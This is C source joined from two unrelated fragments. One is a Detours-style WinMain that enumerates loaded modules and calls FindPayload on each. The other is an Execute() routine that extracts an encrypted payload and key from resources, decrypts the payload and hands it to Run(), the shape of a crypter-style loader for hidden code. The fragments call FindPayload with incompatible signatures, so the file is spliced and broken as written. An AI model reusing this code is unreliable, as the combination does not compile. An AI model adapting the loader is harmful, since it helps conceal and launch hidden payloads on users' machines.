int WINAPI WinMain(HINSTANCE hinst, HINSTANCE hprev, LPSTR lpszCmdLine, int nCmdShow)
{
    /* hprev and nCmdShow are never read; hinst and lpszCmdLine are only
       compared against each other at the end of the function. */
    (void)hprev;
    (void)nCmdShow;

    /* NULL presumably selects the running executable itself — the
       "Source .EXE" label suggests so; confirm against FindPayload. */
    printf("Source .EXE:\n");
    FindPayload(NULL);
    printf("\n");

    printf("DLL and EXE binaries loaded:\n");

    /* Calling into each test DLL presumably guarantees it is mapped before
       the module walk below — confirm. */
    EDll1Function();
    EDll2Function();
    EDll3Function();

    /* Walk every module of the process; the first call is made with NULL
       and each subsequent call continues from the module returned last. */
    HINSTANCE hmod = DetourEnumerateModules(NULL);
    while (hmod != NULL) {
        FindPayload(hmod);
        hmod = DetourEnumerateModules(hmod);
    }

    /* The two pointers are not expected to be equal; the branch exists so the
       image keeps a reference to DispatchMessage (see the original comment). */
    if ((PVOID)hinst == (PVOID)lpszCmdLine) {
        DispatchMessage(NULL);                          // Force load of gdi32.dll
    }

    return 0;
}
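/*
 * Locate the payload and key resources, decrypt a heap copy of the payload
 * with the key, hand it to Run(), and release the copy.
 *
 * Returns FALSE if either resource lookup or the heap allocation fails;
 * otherwise returns whatever Run() returned.
 *
 * Fixes versus the previous revision: the decrypted-payload buffer is now
 * freed when the key lookup fails (it leaked before), and the key hex dump no
 * longer reads past the end of the key when nKeySize is not a multiple of 16.
 */
BOOL Execute(void) {
	PRINT_INFO("Retrieving payload resource.\n");
	LPVOID lpPayload = NULL;
	SIZE_T nPayloadSize = 0;
	if (!FindPayload(&lpPayload, &nPayloadSize, RES_ID_PAYLOAD)) {
		return FALSE;
	}

	/* Work on a private copy so the resource data itself is left untouched. */
	PRINT_INFO("Allocating payload buffer for decryption.\n");
	LPVOID lpDecryptPayload = MyHeapAlloc(nPayloadSize);
	if (!lpDecryptPayload) {
		PRINT_ERROR(
			"Failed to allocate buffer: <0x%08x>\n",
			GetLastError()
		);
		return FALSE;
	}
	memcpy(lpDecryptPayload, lpPayload, nPayloadSize);

	/* NOTE(review): this call passes an LPBYTE* where the first call passed an
	   LPVOID*; one of the two is an incompatible-pointer conversion — check
	   FindPayload's declared parameter type. */
	PRINT_INFO("Retrieving key resource.\n");
	LPBYTE lpKey = NULL;
	SIZE_T nKeySize = 0;
	if (!FindPayload(&lpKey, &nKeySize, RES_ID_KEY)) {
		MyHeapFree(lpDecryptPayload);   /* do not leak the copy on this path */
		return FALSE;
	}

	/* Hex dump of the key, 16 bytes per row with a gap after 8; the inner
	   bound keeps the last (possibly short) row inside the key buffer. */
	PRINT_INFO("Extracted key:\n");
	for (SIZE_T i = 0; i < nKeySize; i += 16) {
		for (SIZE_T j = 0; j < 16 && i + j < nKeySize; j++) {
			if (j == 8) {
				PrintColour(CONSOLE_PURPLE, "  ");
			}
			PrintColour(CONSOLE_PURPLE, "%02x ", lpKey[i + j]);
		}
		puts("");
	}

	PRINT_INFO("Decrypting payload.\n");
	DecryptPayload(lpDecryptPayload, nPayloadSize, lpKey, nKeySize);

	BOOL bRet = Run(lpDecryptPayload, nPayloadSize);

	/* lpPayload and lpKey are not freed here; presumably they point at
	   resource data owned by the image — confirm against FindPayload. */
	MyHeapFree(lpDecryptPayload);

	return bRet;
}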